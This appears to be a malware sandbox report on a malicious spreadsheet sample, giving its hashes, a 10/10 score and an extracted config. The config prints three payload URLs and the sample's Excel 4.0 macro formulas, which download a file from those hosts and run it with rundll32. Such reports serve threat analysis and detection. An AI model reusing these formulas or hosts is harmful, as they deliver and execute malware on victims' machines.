General
-
Target
1db4edb8e55162ec017454ce23a5fd342ea291fd92f0ac2de37b661d186fa2f0
-
Size
99KB
-
Sample
241120-zj95pssqhx
-
MD5
0a8784a4c9058fb73f52ca8f90e66427
-
SHA1
f6c4413c00340ecdd51fe026c43f2b1a11c67b2b
-
SHA256
1db4edb8e55162ec017454ce23a5fd342ea291fd92f0ac2de37b661d186fa2f0
-
SHA512
d7cad254386cc33d8acc88bd8d195cb302890b6194b6b16861d8ad2c3f288c79b26880c2d0c2d9e42748d881e854f728d19d51eee1021353daf1ab302c7ff450
-
SSDEEP
1536:rlu4xYp20B+axURtKckrr9qZGrhD1GW+wZk4lHpuaI4qDVJac:lYHHxutKckrpqZGh+wrlJuaIjl
Malware Config
Extracted
http://avionxpress.com/lp/T9b1Bga4FdDfP5HI/
http://news.tapchivietkieu.info/wordpress/CJzFM/
http://monosun.net/wp-includes/JcDnYBSKpyfU/
-
formulas
=FORMULA() =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://avionxpress.com/lp/T9b1Bga4FdDfP5HI/","..\ourl.ocx",0,0) =IF('EGGEGDGE'!B11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://news.tapchivietkieu.info/wordpress/CJzFM/","..\ourl.ocx",0,0)) =IF('EGGEGDGE'!B13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://monosun.net/wp-includes/JcDnYBSKpyfU/","..\ourl.ocx",0,0)) =IF('EGGEGDGE'!B15<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\rundll32.exe ..\ourl.ocx,D""&""l""&""lR""&""egister""&""Serve""&""r") =RETURN()
Extracted
http://avionxpress.com/lp/T9b1Bga4FdDfP5HI/
http://news.tapchivietkieu.info/wordpress/CJzFM/
http://monosun.net/wp-includes/JcDnYBSKpyfU/
Targets
-
-
Target
1db4edb8e55162ec017454ce23a5fd342ea291fd92f0ac2de37b661d186fa2f0
-
Size
99KB
-
MD5
0a8784a4c9058fb73f52ca8f90e66427
-
SHA1
f6c4413c00340ecdd51fe026c43f2b1a11c67b2b
-
SHA256
1db4edb8e55162ec017454ce23a5fd342ea291fd92f0ac2de37b661d186fa2f0
-
SHA512
d7cad254386cc33d8acc88bd8d195cb302890b6194b6b16861d8ad2c3f288c79b26880c2d0c2d9e42748d881e854f728d19d51eee1021353daf1ab302c7ff450
-
SSDEEP
1536:rlu4xYp20B+axURtKckrr9qZGrhD1GW+wZk4lHpuaI4qDVJac:lYHHxutKckrpqZGh+wrlJuaIjl
Score10/10 -